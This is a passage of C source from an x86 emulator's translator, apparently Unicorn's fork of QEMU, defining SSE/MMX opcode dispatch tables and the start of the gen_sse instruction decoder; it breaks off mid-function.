tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, d_offset + offsetof(ZMMReg, ZMM_Q(1))); } static inline void gen_op_movq(DisasContext *s, int d_offset, int s_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s_offset); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, d_offset); } static inline void gen_op_movl(DisasContext *s, int d_offset, int s_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s_offset); tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, d_offset); } static inline void gen_op_movq_env_0(DisasContext *s, int d_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, s->tmp1_i64, 0); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, d_offset); } typedef void (*SSEFunc_i_ep)(TCGContext *s, TCGv_i32 val, TCGv_ptr env, TCGv_ptr reg); typedef void (*SSEFunc_l_ep)(TCGContext *s, TCGv_i64 val, TCGv_ptr env, TCGv_ptr reg); typedef void (*SSEFunc_0_epi)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg, TCGv_i32 val); typedef void (*SSEFunc_0_epl)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg, TCGv_i64 val); typedef void (*SSEFunc_0_epp)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b); typedef void (*SSEFunc_0_eppi)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b, TCGv_i32 val); typedef void (*SSEFunc_0_ppi)(TCGContext *s, TCGv_ptr reg_a, TCGv_ptr reg_b, TCGv_i32 val); typedef void (*SSEFunc_0_eppt)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b, TCGv val); #define SSE_SPECIAL ((void *)1) #define SSE_DUMMY ((void *)2) #define MMX_OP2(x) { gen_helper_ ## x ## _mmx, gen_helper_ ## x ## _xmm } #define SSE_FOP(x) { gen_helper_ ## x ## ps, gen_helper_ ## x ## pd, \ gen_helper_ ## x ## ss, gen_helper_ ## x ## sd, } static const SSEFunc_0_epp sse_op_table1[256][4] = { /* 3DNow! extensions */ [0x0e] = { SSE_DUMMY }, /* femms */ [0x0f] = { SSE_DUMMY }, /* pf... */ /* pure SSE operations */ [0x10] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movups, movupd, movss, movsd */ [0x11] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movups, movupd, movss, movsd */ [0x12] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movlps, movlpd, movsldup, movddup */ [0x13] = { SSE_SPECIAL, SSE_SPECIAL }, /* movlps, movlpd */ [0x14] = { gen_helper_punpckldq_xmm, gen_helper_punpcklqdq_xmm }, [0x15] = { gen_helper_punpckhdq_xmm, gen_helper_punpckhqdq_xmm }, [0x16] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movhps, movhpd, movshdup */ [0x17] = { SSE_SPECIAL, SSE_SPECIAL }, /* movhps, movhpd */ [0x28] = { SSE_SPECIAL, SSE_SPECIAL }, /* movaps, movapd */ [0x29] = { SSE_SPECIAL, SSE_SPECIAL }, /* movaps, movapd */ [0x2a] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvtpi2ps, cvtpi2pd, cvtsi2ss, cvtsi2sd */ [0x2b] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movntps, movntpd, movntss, movntsd */ [0x2c] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvttps2pi, cvttpd2pi, cvttsd2si, cvttss2si */ [0x2d] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvtps2pi, cvtpd2pi, cvtsd2si, cvtss2si */ [0x2e] = { gen_helper_ucomiss, gen_helper_ucomisd }, [0x2f] = { gen_helper_comiss, gen_helper_comisd }, [0x50] = { SSE_SPECIAL, SSE_SPECIAL }, /* movmskps, movmskpd */ [0x51] = SSE_FOP(sqrt), [0x52] = { gen_helper_rsqrtps, NULL, gen_helper_rsqrtss, NULL }, [0x53] = { gen_helper_rcpps, NULL, gen_helper_rcpss, NULL }, [0x54] = { gen_helper_pand_xmm, gen_helper_pand_xmm }, /* andps, andpd */ [0x55] = { gen_helper_pandn_xmm, gen_helper_pandn_xmm }, /* andnps, andnpd */ [0x56] = { gen_helper_por_xmm, gen_helper_por_xmm }, /* orps, orpd */ [0x57] = { gen_helper_pxor_xmm, gen_helper_pxor_xmm }, /* xorps, xorpd */ [0x58] = SSE_FOP(add), [0x59] = SSE_FOP(mul), [0x5a] = { gen_helper_cvtps2pd, gen_helper_cvtpd2ps, gen_helper_cvtss2sd, gen_helper_cvtsd2ss }, [0x5b] = { gen_helper_cvtdq2ps, gen_helper_cvtps2dq, gen_helper_cvttps2dq }, [0x5c] = SSE_FOP(sub), [0x5d] = SSE_FOP(min), [0x5e] = SSE_FOP(div), [0x5f] = SSE_FOP(max), [0xc2] = SSE_FOP(cmpeq), [0xc6] = { (SSEFunc_0_epp)gen_helper_shufps, (SSEFunc_0_epp)gen_helper_shufpd }, /* XXX: casts */ /* SSSE3, SSE4, MOVBE, CRC32, BMI1, BMI2, ADX. */ [0x38] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, [0x3a] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* MMX ops and their SSE extensions */ [0x60] = MMX_OP2(punpcklbw), [0x61] = MMX_OP2(punpcklwd), [0x62] = MMX_OP2(punpckldq), [0x63] = MMX_OP2(packsswb), [0x64] = MMX_OP2(pcmpgtb), [0x65] = MMX_OP2(pcmpgtw), [0x66] = MMX_OP2(pcmpgtl), [0x67] = MMX_OP2(packuswb), [0x68] = MMX_OP2(punpckhbw), [0x69] = MMX_OP2(punpckhwd), [0x6a] = MMX_OP2(punpckhdq), [0x6b] = MMX_OP2(packssdw), [0x6c] = { NULL, gen_helper_punpcklqdq_xmm }, [0x6d] = { NULL, gen_helper_punpckhqdq_xmm }, [0x6e] = { SSE_SPECIAL, SSE_SPECIAL }, /* movd mm, ea */ [0x6f] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movq, movdqa, , movqdu */ [0x70] = { (SSEFunc_0_epp)gen_helper_pshufw_mmx, (SSEFunc_0_epp)gen_helper_pshufd_xmm, (SSEFunc_0_epp)gen_helper_pshufhw_xmm, (SSEFunc_0_epp)gen_helper_pshuflw_xmm }, /* XXX: casts */ [0x71] = { SSE_SPECIAL, SSE_SPECIAL }, /* shiftw */ [0x72] = { SSE_SPECIAL, SSE_SPECIAL }, /* shiftd */ [0x73] = { SSE_SPECIAL, SSE_SPECIAL }, /* shiftq */ [0x74] = MMX_OP2(pcmpeqb), [0x75] = MMX_OP2(pcmpeqw), [0x76] = MMX_OP2(pcmpeql), [0x77] = { SSE_DUMMY }, /* emms */ [0x78] = { NULL, SSE_SPECIAL, NULL, SSE_SPECIAL }, /* extrq_i, insertq_i */ [0x79] = { NULL, gen_helper_extrq_r, NULL, gen_helper_insertq_r }, [0x7c] = { NULL, gen_helper_haddpd, NULL, gen_helper_haddps }, [0x7d] = { NULL, gen_helper_hsubpd, NULL, gen_helper_hsubps }, [0x7e] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movd, movd, , movq */ [0x7f] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movq, movdqa, movdqu */ [0xc4] = { SSE_SPECIAL, SSE_SPECIAL }, /* pinsrw */ [0xc5] = { SSE_SPECIAL, SSE_SPECIAL }, /* pextrw */ [0xd0] = { NULL, gen_helper_addsubpd, NULL, gen_helper_addsubps }, [0xd1] = MMX_OP2(psrlw), [0xd2] = MMX_OP2(psrld), [0xd3] = MMX_OP2(psrlq), [0xd4] = MMX_OP2(paddq), [0xd5] = MMX_OP2(pmullw), [0xd6] = { NULL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, [0xd7] = { SSE_SPECIAL, SSE_SPECIAL }, /* pmovmskb */ [0xd8] = MMX_OP2(psubusb), [0xd9] = MMX_OP2(psubusw), [0xda] = MMX_OP2(pminub), [0xdb] = MMX_OP2(pand), [0xdc] = MMX_OP2(paddusb), [0xdd] = MMX_OP2(paddusw), [0xde] = MMX_OP2(pmaxub), [0xdf] = MMX_OP2(pandn), [0xe0] = MMX_OP2(pavgb), [0xe1] = MMX_OP2(psraw), [0xe2] = MMX_OP2(psrad), [0xe3] = MMX_OP2(pavgw), [0xe4] = MMX_OP2(pmulhuw), [0xe5] = MMX_OP2(pmulhw), [0xe6] = { NULL, gen_helper_cvttpd2dq, gen_helper_cvtdq2pd, gen_helper_cvtpd2dq }, [0xe7] = { SSE_SPECIAL , SSE_SPECIAL }, /* movntq, movntq */ [0xe8] = MMX_OP2(psubsb), [0xe9] = MMX_OP2(psubsw), [0xea] = MMX_OP2(pminsw), [0xeb] = MMX_OP2(por), [0xec] = MMX_OP2(paddsb), [0xed] = MMX_OP2(paddsw), [0xee] = MMX_OP2(pmaxsw), [0xef] = MMX_OP2(pxor), [0xf0] = { NULL, NULL, NULL, SSE_SPECIAL }, /* lddqu */ [0xf1] = MMX_OP2(psllw), [0xf2] = MMX_OP2(pslld), [0xf3] = MMX_OP2(psllq), [0xf4] = MMX_OP2(pmuludq), [0xf5] = MMX_OP2(pmaddwd), [0xf6] = MMX_OP2(psadbw), [0xf7] = { (SSEFunc_0_epp)gen_helper_maskmov_mmx, (SSEFunc_0_epp)gen_helper_maskmov_xmm }, /* XXX: casts */ [0xf8] = MMX_OP2(psubb), [0xf9] = MMX_OP2(psubw), [0xfa] = MMX_OP2(psubl), [0xfb] = MMX_OP2(psubq), [0xfc] = MMX_OP2(paddb), [0xfd] = MMX_OP2(paddw), [0xfe] = MMX_OP2(paddl), }; static const SSEFunc_0_epp sse_op_table2[3 * 8][2] = { [0 + 2] = MMX_OP2(psrlw), [0 + 4] = MMX_OP2(psraw), [0 + 6] = MMX_OP2(psllw), [8 + 2] = MMX_OP2(psrld), [8 + 4] = MMX_OP2(psrad), [8 + 6] = MMX_OP2(pslld), [16 + 2] = MMX_OP2(psrlq), [16 + 3] = { NULL, gen_helper_psrldq_xmm }, [16 + 6] = MMX_OP2(psllq), [16 + 7] = { NULL, gen_helper_pslldq_xmm }, }; static const SSEFunc_0_epi sse_op_table3ai[] = { gen_helper_cvtsi2ss, gen_helper_cvtsi2sd }; #ifdef TARGET_X86_64 static const SSEFunc_0_epl sse_op_table3aq[] = { gen_helper_cvtsq2ss, gen_helper_cvtsq2sd }; #endif static const SSEFunc_i_ep sse_op_table3bi[] = { gen_helper_cvttss2si, gen_helper_cvtss2si, gen_helper_cvttsd2si, gen_helper_cvtsd2si }; #ifdef TARGET_X86_64 static const SSEFunc_l_ep sse_op_table3bq[] = { gen_helper_cvttss2sq, gen_helper_cvtss2sq, gen_helper_cvttsd2sq, gen_helper_cvtsd2sq }; #endif static const SSEFunc_0_epp sse_op_table4[8][4] = { SSE_FOP(cmpeq), SSE_FOP(cmplt), SSE_FOP(cmple), SSE_FOP(cmpunord), SSE_FOP(cmpneq), SSE_FOP(cmpnlt), SSE_FOP(cmpnle), SSE_FOP(cmpord), }; static const SSEFunc_0_epp sse_op_table5[256] = { [0x0c] = gen_helper_pi2fw, [0x0d] = gen_helper_pi2fd, [0x1c] = gen_helper_pf2iw, [0x1d] = gen_helper_pf2id, [0x8a] = gen_helper_pfnacc, [0x8e] = gen_helper_pfpnacc, [0x90] = gen_helper_pfcmpge, [0x94] = gen_helper_pfmin, [0x96] = gen_helper_pfrcp, [0x97] = gen_helper_pfrsqrt, [0x9a] = gen_helper_pfsub, [0x9e] = gen_helper_pfadd, [0xa0] = gen_helper_pfcmpgt, [0xa4] = gen_helper_pfmax, [0xa6] = gen_helper_movq, /* pfrcpit1; no need to actually increase precision */ [0xa7] = gen_helper_movq, /* pfrsqit1 */ [0xaa] = gen_helper_pfsubr, [0xae] = gen_helper_pfacc, [0xb0] = gen_helper_pfcmpeq, [0xb4] = gen_helper_pfmul, [0xb6] = gen_helper_movq, /* pfrcpit2 */ [0xb7] = gen_helper_pmulhrw_mmx, [0xbb] = gen_helper_pswapd, [0xbf] = gen_helper_pavgb_mmx /* pavgusb */ }; struct SSEOpHelper_epp { SSEFunc_0_epp op[2]; uint32_t ext_mask; }; struct SSEOpHelper_eppi { SSEFunc_0_eppi op[2]; uint32_t ext_mask; }; #define SSSE3_OP(x) { MMX_OP2(x), CPUID_EXT_SSSE3 } #define SSE41_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_SSE41 } #define SSE42_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_SSE42 } #define SSE41_SPECIAL { { NULL, SSE_SPECIAL }, CPUID_EXT_SSE41 } #define PCLMULQDQ_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, \ CPUID_EXT_PCLMULQDQ } #define AESNI_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_AES } static const struct SSEOpHelper_epp sse_op_table6[256] = { [0x00] = SSSE3_OP(pshufb), [0x01] = SSSE3_OP(phaddw), [0x02] = SSSE3_OP(phaddd), [0x03] = SSSE3_OP(phaddsw), [0x04] = SSSE3_OP(pmaddubsw), [0x05] = SSSE3_OP(phsubw), [0x06] = SSSE3_OP(phsubd), [0x07] = SSSE3_OP(phsubsw), [0x08] = SSSE3_OP(psignb), [0x09] = SSSE3_OP(psignw), [0x0a] = SSSE3_OP(psignd), [0x0b] = SSSE3_OP(pmulhrsw), [0x10] = SSE41_OP(pblendvb), [0x14] = SSE41_OP(blendvps), [0x15] = SSE41_OP(blendvpd), [0x17] = SSE41_OP(ptest), [0x1c] = SSSE3_OP(pabsb), [0x1d] = SSSE3_OP(pabsw), [0x1e] = SSSE3_OP(pabsd), [0x20] = SSE41_OP(pmovsxbw), [0x21] = SSE41_OP(pmovsxbd), [0x22] = SSE41_OP(pmovsxbq), [0x23] = SSE41_OP(pmovsxwd), [0x24] = SSE41_OP(pmovsxwq), [0x25] = SSE41_OP(pmovsxdq), [0x28] = SSE41_OP(pmuldq), [0x29] = SSE41_OP(pcmpeqq), [0x2a] = SSE41_SPECIAL, /* movntqda */ [0x2b] = SSE41_OP(packusdw), [0x30] = SSE41_OP(pmovzxbw), [0x31] = SSE41_OP(pmovzxbd), [0x32] = SSE41_OP(pmovzxbq), [0x33] = SSE41_OP(pmovzxwd), [0x34] = SSE41_OP(pmovzxwq), [0x35] = SSE41_OP(pmovzxdq), [0x37] = SSE42_OP(pcmpgtq), [0x38] = SSE41_OP(pminsb), [0x39] = SSE41_OP(pminsd), [0x3a] = SSE41_OP(pminuw), [0x3b] = SSE41_OP(pminud), [0x3c] = SSE41_OP(pmaxsb), [0x3d] = SSE41_OP(pmaxsd), [0x3e] = SSE41_OP(pmaxuw), [0x3f] = SSE41_OP(pmaxud), [0x40] = SSE41_OP(pmulld), [0x41] = SSE41_OP(phminposuw), [0xdb] = AESNI_OP(aesimc), [0xdc] = AESNI_OP(aesenc), [0xdd] = AESNI_OP(aesenclast), [0xde] = AESNI_OP(aesdec), [0xdf] = AESNI_OP(aesdeclast), }; static const struct SSEOpHelper_eppi sse_op_table7[256] = { [0x08] = SSE41_OP(roundps), [0x09] = SSE41_OP(roundpd), [0x0a] = SSE41_OP(roundss), [0x0b] = SSE41_OP(roundsd), [0x0c] = SSE41_OP(blendps), [0x0d] = SSE41_OP(blendpd), [0x0e] = SSE41_OP(pblendw), [0x0f] = SSSE3_OP(palignr), [0x14] = SSE41_SPECIAL, /* pextrb */ [0x15] = SSE41_SPECIAL, /* pextrw */ [0x16] = SSE41_SPECIAL, /* pextrd/pextrq */ [0x17] = SSE41_SPECIAL, /* extractps */ [0x20] = SSE41_SPECIAL, /* pinsrb */ [0x21] = SSE41_SPECIAL, /* insertps */ [0x22] = SSE41_SPECIAL, /* pinsrd/pinsrq */ [0x40] = SSE41_OP(dpps), [0x41] = SSE41_OP(dppd), [0x42] = SSE41_OP(mpsadbw), [0x44] = PCLMULQDQ_OP(pclmulqdq), [0x60] = SSE42_OP(pcmpestrm), [0x61] = SSE42_OP(pcmpestri), [0x62] = SSE42_OP(pcmpistrm), [0x63] = SSE42_OP(pcmpistri), [0xdf] = AESNI_OP(aeskeygenassist), }; static void gen_sse(CPUX86State *env, DisasContext *s, int b, target_ulong pc_start, int rex_r) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int b1, op1_offset, op2_offset, is_xmm, val; int modrm, mod, rm, reg; SSEFunc_0_epp sse_fn_epp; SSEFunc_0_eppi sse_fn_eppi; SSEFunc_0_ppi sse_fn_ppi; SSEFunc_0_eppt sse_fn_eppt; MemOp ot; b &= 0xff; if (s->prefix & PREFIX_DATA) b1 = 1; else if (s->prefix & PREFIX_REPZ) b1 = 2; else if (s->prefix & PREFIX_REPNZ) b1 = 3; else b1 = 0; sse_fn_epp = sse_op_table1[b][b1]; if (!sse_fn_epp) { goto unknown_op; } if ((b <= 0x5f && b >= 0x10) || b == 0xc6 || b == 0xc2) { is_xmm = 1; } else { if (b1 == 0) { /* MMX case */ is_xmm = 0; } else { is_xmm = 1; } } /* simple MMX/SSE operation */ if (s->flags & HF_TS_MASK) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); return; } if (s->flags & HF_EM_MASK) { illegal_op: gen_illegal_opcode(s); return; } if (is_xmm && !(s->flags & HF_OSFXSR_MASK) && ((b != 0x38 && b != 0x3a) || (s->prefix & PREFIX_DATA))) { goto unknown_op; } if (b == 0x0e) { if (!(s->cpuid_ext2_features & CPUID_EXT2_3DNOW)) { /* If we were fully decoding this we might use illegal_op. */ goto unknown_op; } /* femms */ gen_helper_emms(tcg_ctx, tcg_ctx->cpu_env); return; } if (b == 0x77) { /* emms */ gen_helper_emms(tcg_ctx, tcg_ctx->cpu_env); return; } /* prepare MMX state (XXX: optimize by storing fptt and fptags in the static cpu state) */ if (!is_xmm) { gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); } modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7); if (is_xmm) reg |= rex_r; mod = (modrm >> 6) & 3; /* VEX.L (256 bit) encodings are not supported */ if (s->vex_l != 0) { goto illegal_op; // perhaps it should be unknown_op? } if (sse_fn_epp == SSE_SPECIAL) { b |= (b1 << 8); switch(b) { case 0x0e7: /* movntq */ if (mod == 3) { goto illegal_op; } gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); break; case 0x1e7: /* movntdq */ case 0x02b: /* movntps */ case 0x12b: /* movntps */ if (mod == 3) goto illegal_op; gen_lea_modrm(env, s, modrm); gen_sto_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); break; case 0x3f0: /* lddqu */ if (mod == 3) goto illegal_op; gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); break; case 0x22b: /* movntss */ case 0x32b: /* movntsd */ if (mod == 3) goto illegal_op; gen_lea_modrm(env, s, modrm); if (b1 & 1) { gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0))); gen_op_st_v(s, MO_32, s->T0, s->A0); } break; case 0x6e: /* movd mm, ea */ #ifdef TARGET_X86_64 if (s->dflag == MO_64) { gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 0); tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, fpregs[reg].mmx)); } else #endif { gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 0); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx)); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_movl_mm_T0_mmx(tcg_ctx, s->ptr0, s->tmp2_i32); } break; case 0x16e: /* movd xmm, ea */ #ifdef TARGET_X86_64 if (s->dflag == MO_64) { gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 0); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg])); gen_helper_movq_mm_T0_xmm(tcg_ctx, s->ptr0, s->T0); } else #endif { gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 0); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg])); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_movl_mm_T0_xmm(tcg_ctx, s->ptr0, s->tmp2_i32); } break; case 0x6f: /* movq mm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); } else { rm = (modrm & 7); tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[rm].mmx)); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx)); } break; case 0x010: /* movups */ case 0x110: /* movupd */ case 0x028: /* movaps */ case 0x128: /* movapd */ case 0x16f: /* movdqa xmm, ea */ case 0x26f: /* movdqu xmm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); } else { rm = (modrm & 7) | REX_B(s); gen_op_movo(s, offsetof(CPUX86State, xmm_regs[reg]), offsetof(CPUX86State,xmm_regs[rm])); } break; case 0x210: /* movss xmm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, MO_32, s->T0, s->A0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0))); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(1))); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2))); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(0))); } break; case 0x310: /* movsd xmm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2))); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); } break; case 0x012: /* movlps */ case 0x112: /* movlpd */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { /* movhlps */ rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(1))); } break; case 0x212: /* movsldup */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); } else { rm = (modrm & 7) | REX_B(s); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(0))); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(2))); } gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(1)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(0))); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(2))); break; case 0x312: /* movddup */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); } gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1)), offsetof(CPUX86State,xmm_regs[reg].ZMM_Q(0))); break; case 0x016: /* movhps */ case 0x116: /* movhpd */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1))); } else { /* movlhps */ rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); } break; case 0x216: /* movshdup */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); } else { rm = (modrm & 7) | REX_B(s); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(1)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(1))); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(3))); } gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(1))); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(3))); break; case 0x178: case 0x378: { int bit_index, field_length; if (b1 == 1 && reg != 0) goto illegal_op; field_length = x86_ldub_code(env, s) & 0x3F; bit_index = x86_ldub_code(env, s) & 0x3F; tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg])); if (b1 == 1) gen_helper_extrq_i(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, tcg_const_i32(tcg_ctx, bit_index), tcg_const_i32(tcg_ctx, field_length)); else gen_helper_insertq_i(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, tcg_const_i32(tcg_ctx, bit_index), tcg_const_i32(tcg_ctx, field_length)); } break; case 0x7e: /* movd ea, mm */ #ifdef TARGET_X86_64 if (s->dflag == MO_64) { tcg_gen_ld_i64(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx)); gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 1); } else #endif { tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx.MMX_L(0))); gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 1); } break; case 0x17e: /* movd ea, xmm */ #ifdef TARGET_X86_64 if (s->dflag == MO_64) { tcg_gen_ld_i64(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg].ZMM_Q(0))); gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 1); } else #endif { tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg].ZMM_L(0))); gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 1); } break; case 0x27e: /* movq xmm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); } gen_op_movq_env_0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1))); break; case 0x7f: /* movq ea, mm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); } else { rm = (modrm & 7); gen_op_movq(s, offsetof(CPUX86State, fpregs[rm].mmx), offsetof(CPUX86State,fpregs[reg].mmx)); } break; case 0x011: /* movups */ case 0x111: /* movupd */ case 0x029: /* movaps */ case 0x129: /* movapd */ case 0x17f: /* movdqa ea, xmm */ case 